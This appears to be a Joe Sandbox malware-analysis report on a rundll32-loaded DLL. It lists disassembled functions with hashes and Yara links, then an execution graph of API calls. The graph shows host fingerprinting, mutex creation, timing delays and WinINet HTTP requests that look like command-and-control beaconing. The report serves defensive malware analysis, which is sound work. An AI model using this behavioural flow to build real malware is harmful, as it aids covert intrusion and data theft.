                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794049644.0000000180077000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794230283.000000018007C000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794279409.000000018007D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Unwind__except_validate_context_record
                                                                                                                                                                                                                                                  • String ID: csm
                                                                                                                                                                                                                                                  • API String ID: 2208346422-1018135373
                                                                                                                                                                                                                                                  • Opcode ID: 41b12dda0e093764b089897d1ff21e540db28dc560569149afab03f8e9fdc7c2
                                                                                                                                                                                                                                                  • Instruction ID: 2672bec40da291ce11c6250c0dad722d8f4cfd31cfcba8b085e74eb73a93bdbb
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 41b12dda0e093764b089897d1ff21e540db28dc560569149afab03f8e9fdc7c2
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FC51F7323196088AFB96CF15E844BAD33A5F749BC8F50C121FA4A47789EF79CA49C700
                                                                                                                                                                                                                                                  Function 0000000180044C2C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3791752519.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3791648369.0000000180000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792001676.000000018005F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792108362.0000000180073000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792216235.0000000180074000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794049644.0000000180077000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794230283.000000018007C000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794279409.000000018007D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                  • String ID: .$_.,
                                                                                                                                                                                                                                                  • API String ID: 3215553584-3384562259
                                                                                                                                                                                                                                                  • Opcode ID: c5e31342db8f2559d412056efb8cb4ce2ddbaaf83501e9c59faeafa9e2557006
                                                                                                                                                                                                                                                  • Instruction ID: 86f15d9f2fdf1f05cb57339bd986fd197501509ab2478ee385be308a635b250d
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c5e31342db8f2559d412056efb8cb4ce2ddbaaf83501e9c59faeafa9e2557006
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9B41E277A10A4885FBF28A2594C17E92290E78CBE8F57C611FA550B6C5DF74CB8D8708
                                                                                                                                                                                                                                                  Function 000000018000E744 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 117COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3791752519.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3791648369.0000000180000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792001676.000000018005F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792108362.0000000180073000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792216235.0000000180074000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794049644.0000000180077000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794230283.000000018007C000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794279409.000000018007D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CreateFrameInfo__except_validate_context_record
                                                                                                                                                                                                                                                  • String ID: csm
                                                                                                                                                                                                                                                  • API String ID: 2558813199-1018135373
                                                                                                                                                                                                                                                  • Opcode ID: 3012941d225893ff0a1596aed794f60caa97295d49179766bd7cee36fad85c83
                                                                                                                                                                                                                                                  • Instruction ID: 98e23b6382448741e885f2483867041e669b118fd1c307fb1a3f8b737a70bd12
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3012941d225893ff0a1596aed794f60caa97295d49179766bd7cee36fad85c83
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 37513C7321578886E6A1EF15E4403AE77A4F38DBE0F148125FB8947B96DF38C565CB00
                                                                                                                                                                                                                                                  Function 000000018004CAF0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 115COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3791752519.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3791648369.0000000180000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792001676.000000018005F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792108362.0000000180073000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792216235.0000000180074000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794049644.0000000180077000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794230283.000000018007C000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794279409.000000018007D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: memcpy_s
                                                                                                                                                                                                                                                  • String ID: s
                                                                                                                                                                                                                                                  • API String ID: 1502251526-453955339
                                                                                                                                                                                                                                                  • Opcode ID: d69b12cfc8f0d4f7e4e881a0439bac03a6efd0e78ae662d86089a4382a233e0c
                                                                                                                                                                                                                                                  • Instruction ID: 8ceb7f17a8548fb968498d81ab2351303633656c3688867a1d3cd218ddfc299c
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d69b12cfc8f0d4f7e4e881a0439bac03a6efd0e78ae662d86089a4382a233e0c
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 43411332304A4887E3EA8F15E495FED7791F39878CF028116DE0957B81CB38CA4ACB49
                                                                                                                                                                                                                                                  Function 0000000180014EB8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 68COMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3791752519.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3791648369.0000000180000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792001676.000000018005F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792108362.0000000180073000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792216235.0000000180074000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794049644.0000000180077000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794230283.000000018007C000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794279409.000000018007D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Name::operator+
                                                                                                                                                                                                                                                  • String ID: void$void
                                                                                                                                                                                                                                                  • API String ID: 2943138195-3746155364
                                                                                                                                                                                                                                                  • Opcode ID: ddeb0843d538297d14c0c0f86e427d1c8d1caa5713f6d320f941b1835034666f
                                                                                                                                                                                                                                                  • Instruction ID: 9e6cfc430d5bfee4d664579300960906288245c07229e058c69c646796c75a2c
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ddeb0843d538297d14c0c0f86e427d1c8d1caa5713f6d320f941b1835034666f
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A6311D76A10B58D8FB52CBA4E8403EC37B0B74C788F54852AEE4A67B55DF388259C750
                                                                                                                                                                                                                                                  Function 000000018001037C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3791752519.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3791648369.0000000180000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792001676.000000018005F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792108362.0000000180073000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792216235.0000000180074000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794049644.0000000180077000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794230283.000000018007C000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794279409.000000018007D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                                                                                                  • String ID: csm
                                                                                                                                                                                                                                                  • API String ID: 2573137834-1018135373
                                                                                                                                                                                                                                                  • Opcode ID: f9df25044fb1202a836735dffd389a5b3e506e3fb2604136da670c11918c1c4a
                                                                                                                                                                                                                                                  • Instruction ID: 75816c31b48d4b3f6ac9eaf605c0ba6bcc738f1132b3e0c24f52f264a28ed543
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f9df25044fb1202a836735dffd389a5b3e506e3fb2604136da670c11918c1c4a
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B811FB32214B4482EBA28B15E44039A77E5F78CBD8F688225EADD07759DF7DC655CB00
                                                                                                                                                                                                                                                  Function 000000018000FCAC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 27libraryCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3791752519.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3791648369.0000000180000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792001676.000000018005F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792108362.0000000180073000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792216235.0000000180074000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794049644.0000000180077000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794230283.000000018007C000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794279409.000000018007D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ErrorLastLibraryLoad
                                                                                                                                                                                                                                                  • String ID: api-ms-
                                                                                                                                                                                                                                                  • API String ID: 3568775529-2084034818
                                                                                                                                                                                                                                                  • Opcode ID: 3ce1118a3d68641cf7bcb52c8cfbeb9de588c640064439e36528d49136769137
                                                                                                                                                                                                                                                  • Instruction ID: d49a7e86271a456fbcda335a6394c0a77c9d8b30d4fb553590f1245fc1ea6585
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3ce1118a3d68641cf7bcb52c8cfbeb9de588c640064439e36528d49136769137
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 88F0653171150C82FBF69B6658457F622929B4DBD0F58D830FE0546791EE2D878E8700
                                                                                                                                                                                                                                                  Function 0000016AD2751C80 Relevance: 5.2, APIs: 4, Instructions: 177COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3805911238.0000016AD2750000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000016AD2750000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3805911238.0000016AD2796000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_16ad2750000_rundll32.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ErrorLastRead
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 4100373531-0
                                                                                                                                                                                                                                                  • Opcode ID: 5e3dd03f4e36ac629c9e35720315601d05ef0c3755c38ff15dc0a5ec62299b24
                                                                                                                                                                                                                                                  • Instruction ID: 6450de7b296aaf5d35e16fa8b1c5cce2674a7137a43d005f5e22a5bf8aab2bdf
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5e3dd03f4e36ac629c9e35720315601d05ef0c3755c38ff15dc0a5ec62299b24
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E391AD36619B8486DB60CB4AE89035AB7B0F7C9B95F508115EB8E87B68DF3DC444CB01

                                                                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                                                                  Execution Coverage:10.6%
                                                                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                  Signature Coverage:4.6%
                                                                                                                                                                                                                                                  Total number of Nodes:868
                                                                                                                                                                                                                                                  Total number of Limit Nodes:10
                                                                                                                                                                                                                                                  execution_graph 4557 f2c5c0 4558 f2c641 4557->4558 4559 f2c5de 4557->4559 4560 f2c60a CreateFileMappingA 4559->4560 4560->4558 4561 f2c648 MapViewOfFile 4560->4561 4561->4558 4562 f2c67b 4561->4562 4567 f2ca9c 4562->4567 4565 f282b4 NtFreeVirtualMemory 4566 f2c6d1 UnmapViewOfFile CloseHandle 4565->4566 4566->4558 4568 f2c6a0 VirtualFree 4567->4568 4569 f2caad 4567->4569 4568->4565 4573 f2ca68 4569->4573 4572 f282b4 NtFreeVirtualMemory 4572->4568 4574 f2ca8b 4573->4574 4575 f2ca7d 4573->4575 4576 f282b4 NtFreeVirtualMemory 4574->4576 4577 f2ca68 NtFreeVirtualMemory 4575->4577 4578 f2ca95 4576->4578 4577->4574 4578->4572 3834 f243c4 3839 f241b4 3834->3839 3836 f243cd 3837 f243eb 3836->3837 3860 f2c704 NtDelayExecution 3836->3860 3840 f241d4 3839->3840 3861 f26cb4 3840->3861 3842 f241d9 3843 f241fa GetCurrentProcess IsWow64Process 3842->3843 3859 f241dd 3842->3859 3844 f24227 3843->3844 3843->3859 3873 f27274 GetAdaptersInfo 3844->3873 3846 f2422c 3847 f24266 CreateMutexW 3846->3847 3846->3859 3848 f24286 GetLastError 3847->3848 3847->3859 3849 f242ac GetModuleHandleW 3848->3849 3848->3859 3880 f24c2c GetModuleHandleW GetCurrentProcessId 3849->3880 3856 f242ec CreateThread 3857 f24317 3856->3857 4491 f243f4 3856->4491 3903 f26c6c CreateThread 3857->3903 3859->3836 3860->3836 3863 f26cbd 3861->3863 3862 f26cf3 3862->3842 3863->3862 3905 f2abe8 3863->3905 3874 f272ad 3873->3874 3876 f272d1 3873->3876 3931 f2b388 NtAllocateVirtualMemory 3874->3931 3879 f272df 3876->3879 3933 f282b4 3876->3933 3877 f272b8 GetAdaptersInfo 3877->3876 3879->3846 3936 f282f4 3880->3936 3884 f24c7f 3885 f24d17 GetCurrentProcessId 3884->3885 3887 f24d33 3884->3887 3890 f24cf3 3884->3890 3885->3884 3888 f24d44 3887->3888 3889 f242c1 3887->3889 3952 f24d58 3888->3952 3889->3859 3892 f27314 3889->3892 3890->3884 3946 f2891c 3890->3946 3893 f2b388 NtAllocateVirtualMemory 3892->3893 3894 f2732c 3893->3894 4004 f2bfc0 3894->4004 3896 f2737f 3897 f2bfc0 NtAllocateVirtualMemory 3896->3897 3898 f242d1 3897->3898 3898->3859 3899 f271f0 3898->3899 3900 f27208 3899->3900 3901 f2bfc0 NtAllocateVirtualMemory 3900->3901 3902 f242e1 3901->3902 3902->3856 3902->3859 3904 f26ca3 3903->3904 4007 f25a64 3903->4007 3904->3859 3906 f2b1c8 3905->3906 3907 f26ccf 3906->3907 3927 f28a58 3906->3927 3907->3862 3909 f299d0 3907->3909 3912 f2a82d 3909->3912 3910 f28a58 2 API calls 3910->3912 3911 f26cd8 3911->3862 3913 f2aa0c 3911->3913 3912->3910 3912->3911 3916 f2ab3d 3913->3916 3914 f2a8e0 7 API calls 3914->3916 3915 f26ce1 3915->3862 3917 f29350 3915->3917 3916->3914 3916->3915 3918 f29892 3917->3918 3919 f29972 3918->3919 3921 f28a58 GetProcAddress GetProcAddressForCaller 3918->3921 3922 f26cea 3918->3922 3920 f28a58 2 API calls 3919->3920 3920->3922 3921->3918 3922->3862 3923 f2b2a4 3922->3923 3926 f2b315 3923->3926 3924 f2b372 3924->3862 3925 f28a58 2 API calls 3925->3926 3926->3924 3926->3925 3928 f28a79 3927->3928 3930 f28a72 3927->3930 3929 f28b63 GetProcAddress GetProcAddressForCaller 3928->3929 3928->3930 3929->3930 3930->3906 3932 f2b3c8 3931->3932 3932->3877 3934 f282ce NtFreeVirtualMemory 3933->3934 3935 f282ef 3933->3935 3934->3935 3935->3879 3955 f28c30 3936->3955 3941 f28d3c 4002 f2b470 3941->4002 3944 f28d87 3944->3884 3945 f28d6e wsprintfA 3945->3944 3947 f2893a 3946->3947 3948 f28957 3947->3948 3949 f2894c RtlGetVersion 3947->3949 3950 f28961 GetVersionExW 3948->3950 3951 f2896c 3948->3951 3949->3948 3950->3951 3951->3890 3953 f24d73 3952->3953 3954 f24d66 CloseHandle 3952->3954 3953->3889 3954->3953 3956 f28c4e 3955->3956 3957 f28c60 FindFirstVolumeW 3956->3957 3958 f28c81 GetVolumeInformationW FindVolumeClose 3957->3958 3959 f282fd 3957->3959 3958->3959 3960 f28e18 3959->3960 3961 f28e41 3960->3961 3970 f28fc8 3961->3970 3964 f24c73 3964->3941 3965 f2b388 NtAllocateVirtualMemory 3966 f28e63 3965->3966 3967 f28e91 3966->3967 3975 f2be64 3966->3975 3969 f282b4 NtFreeVirtualMemory 3967->3969 3969->3964 3971 f2b388 NtAllocateVirtualMemory 3970->3971 3973 f28fe4 3971->3973 3972 f28e4b 3972->3964 3972->3965 3973->3972 3979 f28ec8 3973->3979 3976 f2be7c 3975->3976 3982 f2beac 3976->3982 3978 f2bea5 3978->3967 3980 f28eea 3979->3980 3981 f28f05 wsprintfA 3980->3981 3981->3972 3985 f2b704 3982->3985 3984 f2bedb 3984->3978 3986 f2b733 3985->3986 3987 f2b718 3985->3987 3991 f2b648 3986->3991 3988 f282b4 NtFreeVirtualMemory 3987->3988 3990 f2b725 3988->3990 3990->3984 3992 f2b66f 3991->3992 3993 f2b679 3991->3993 3999 f2b430 3992->3999 3996 f2b388 NtAllocateVirtualMemory 3993->3996 3998 f2b698 3993->3998 3995 f2b6a5 3995->3990 3996->3998 3997 f282b4 NtFreeVirtualMemory 3997->3995 3998->3995 3998->3997 4000 f2b441 3999->4000 4001 f2b445 VirtualQuery 3999->4001 4000->3993 4001->4000 4003 f28d5a GetUserNameA 4002->4003 4003->3944 4003->3945 4005 f2b388 NtAllocateVirtualMemory 4004->4005 4006 f2bfdc 4005->4006 4006->3896 4009 f25aed 4007->4009 4040 f25b5a new[] 4009->4040 4113 f2c704 NtDelayExecution 4009->4113 4010 f25ba7 4012 f2c704 NtDelayExecution 4039 f25c2f new[] 4012->4039 4014 f282b4 NtFreeVirtualMemory 4014->4040 4015 f2bfc0 NtAllocateVirtualMemory 4015->4039 4016 f26404 wsprintfA 4016->4039 4017 f26025 wsprintfA 4017->4040 4018 f25f36 wsprintfA 4018->4040 4019 f2bfc0 NtAllocateVirtualMemory 4019->4040 4021 f282b4 NtFreeVirtualMemory 4021->4040 4022 f2be64 3 API calls 4022->4040 4023 f2b388 NtAllocateVirtualMemory 4023->4039 4025 f2b388 NtAllocateVirtualMemory 4025->4040 4026 f2b388 NtAllocateVirtualMemory 4028 f26187 WideCharToMultiByte 4026->4028 4027 f2b388 NtAllocateVirtualMemory 4029 f26243 WideCharToMultiByte 4027->4029 4030 f2be64 3 API calls 4028->4030 4033 f2be64 3 API calls 4029->4033 4030->4039 4031 f2b388 NtAllocateVirtualMemory 4032 f262ff WideCharToMultiByte 4031->4032 4035 f2be64 3 API calls 4032->4035 4033->4039 4034 f26fc0 NtAllocateVirtualMemory 4034->4039 4035->4039 4037 f282b4 NtFreeVirtualMemory 4037->4039 4038 f282b4 NtFreeVirtualMemory 4038->4040 4039->4012 4039->4014 4039->4015 4039->4016 4039->4017 4039->4018 4039->4021 4039->4023 4039->4026 4039->4027 4039->4031 4039->4034 4039->4037 4039->4040 4042 f28bdc 3 API calls 4039->4042 4043 f269a2 GetExitCodeThread 4039->4043 4044 f269de GetExitCodeThread 4039->4044 4047 f2be64 NtFreeVirtualMemory NtAllocateVirtualMemory VirtualQuery 4039->4047 4120 f26cfc 4039->4120 4124 f25734 4039->4124 4040->4010 4040->4019 4040->4022 4040->4025 4040->4038 4040->4039 4048 f25484 4040->4048 4059 f28424 4040->4059 4085 f2b770 4040->4085 4093 f26fc0 4040->4093 4097 f24e28 4040->4097 4114 f28bdc 4040->4114 4042->4039 4043->4039 4044->4039 4047->4039 4049 f254bc 4048->4049 4050 f2b388 NtAllocateVirtualMemory 4049->4050 4051 f254e2 4050->4051 4052 f2b388 NtAllocateVirtualMemory 4051->4052 4053 f254f8 InternetCrackUrlA 4052->4053 4054 f2556e 4053->4054 4055 f25554 4053->4055 4054->4040 4056 f282b4 NtFreeVirtualMemory 4055->4056 4057 f25561 4056->4057 4058 f282b4 NtFreeVirtualMemory 4057->4058 4058->4054 4060 f2b388 NtAllocateVirtualMemory 4059->4060 4061 f28452 4060->4061 4062 f28466 GetAdaptersInfo 4061->4062 4063 f2845f 4061->4063 4064 f2848d 4062->4064 4083 f2865b 4062->4083 4063->4040 4065 f2b388 NtAllocateVirtualMemory 4064->4065 4067 f28498 GetAdaptersInfo 4065->4067 4066 f28688 4069 f2b388 NtAllocateVirtualMemory 4066->4069 4070 f284c5 4067->4070 4068 f282b4 NtFreeVirtualMemory 4068->4066 4071 f2869b 4069->4071 4074 f284e6 wsprintfA 4070->4074 4071->4063 4072 f286ac GetComputerNameExA 4071->4072 4073 f28729 GetComputerNameExA 4072->4073 4078 f286c5 4072->4078 4075 f28746 4073->4075 4076 f287db 4073->4076 4082 f28502 4074->4082 4080 f287a6 wsprintfA 4075->4080 4077 f282b4 NtFreeVirtualMemory 4076->4077 4077->4063 4079 f286fa wsprintfA 4078->4079 4079->4073 4080->4076 4081 f28627 wsprintfA 4081->4082 4081->4083 4082->4081 4082->4083 4084 f285b2 wsprintfA 4082->4084 4083->4066 4083->4068 4084->4082 4087 f2b7aa 4085->4087 4086 f2b7b5 4086->4039 4087->4086 4089 f2b7f0 4087->4089 4134 f2c00c 4087->4134 4090 f2b822 4089->4090 4091 f2c00c NtAllocateVirtualMemory 4089->4091 4090->4086 4092 f2c00c NtAllocateVirtualMemory 4090->4092 4091->4090 4092->4086 4094 f26fd5 4093->4094 4096 f26fe6 4093->4096 4095 f2b388 NtAllocateVirtualMemory 4094->4095 4094->4096 4095->4096 4096->4040 4111 f24e5d 4097->4111 4098 f25484 3 API calls 4098->4111 4099 f24d78 InternetOpenW InternetConnectA 4101 f24ec6 4099->4101 4100 f282b4 NtFreeVirtualMemory 4100->4101 4101->4099 4101->4100 4102 f24fc6 4101->4102 4103 f2bfc0 NtAllocateVirtualMemory 4101->4103 4101->4111 4104 f25057 4102->4104 4105 f2504c InternetCloseHandle 4102->4105 4103->4101 4107 f2506a 4104->4107 4108 f2505f InternetCloseHandle 4104->4108 4105->4104 4107->4039 4108->4107 4109 f282b4 NtFreeVirtualMemory 4109->4111 4110 f25022 4110->4102 4111->4098 4111->4101 4111->4102 4111->4109 4111->4110 4137 f25078 4111->4137 4142 f25160 4111->4142 4113->4009 4115 f2b470 4114->4115 4116 f28bef GetCursorPos 4115->4116 4117 f28c02 GetTickCount 4116->4117 4118 f28bfe 4116->4118 4166 f2b620 RtlRandom 4117->4166 4118->4040 4121 f26d12 4120->4121 4122 f2b388 NtAllocateVirtualMemory 4121->4122 4123 f26d2f 4121->4123 4122->4123 4123->4039 4125 f25792 4124->4125 4126 f2bfc0 NtAllocateVirtualMemory 4125->4126 4132 f257b3 4126->4132 4127 f257c0 4127->4039 4129 f25a49 4130 f282b4 NtFreeVirtualMemory 4129->4130 4130->4127 4132->4127 4132->4129 4167 f2cf4c 4132->4167 4173 f2cde8 4132->4173 4183 f244c8 4132->4183 4135 f2b388 NtAllocateVirtualMemory 4134->4135 4136 f2c034 4135->4136 4136->4089 4138 f250bc InternetReadFile 4137->4138 4139 f250de 4138->4139 4140 f25104 4138->4140 4139->4138 4139->4140 4141 f2b704 3 API calls 4139->4141 4140->4101 4141->4139 4143 f2b388 NtAllocateVirtualMemory 4142->4143 4144 f251ab 4143->4144 4145 f2be64 3 API calls 4144->4145 4147 f25204 4145->4147 4146 f25265 4148 f25315 4146->4148 4150 f25292 4146->4150 4147->4146 4149 f2be64 3 API calls 4147->4149 4152 f25350 HttpOpenRequestA 4148->4152 4153 f25253 4149->4153 4151 f252c7 HttpOpenRequestA 4150->4151 4154 f2539c 4151->4154 4152->4154 4153->4146 4155 f2be64 3 API calls 4153->4155 4156 f253a4 4154->4156 4157 f253b3 InternetSetOptionA 4154->4157 4158 f253d6 4154->4158 4155->4146 4159 f25479 4156->4159 4161 f282b4 NtFreeVirtualMemory 4156->4161 4157->4158 4160 f25424 HttpSendRequestA 4158->4160 4164 f253e0 4158->4164 4159->4111 4162 f25443 4160->4162 4161->4159 4162->4156 4163 f282b4 NtFreeVirtualMemory 4162->4163 4163->4156 4165 f253fb HttpSendRequestA 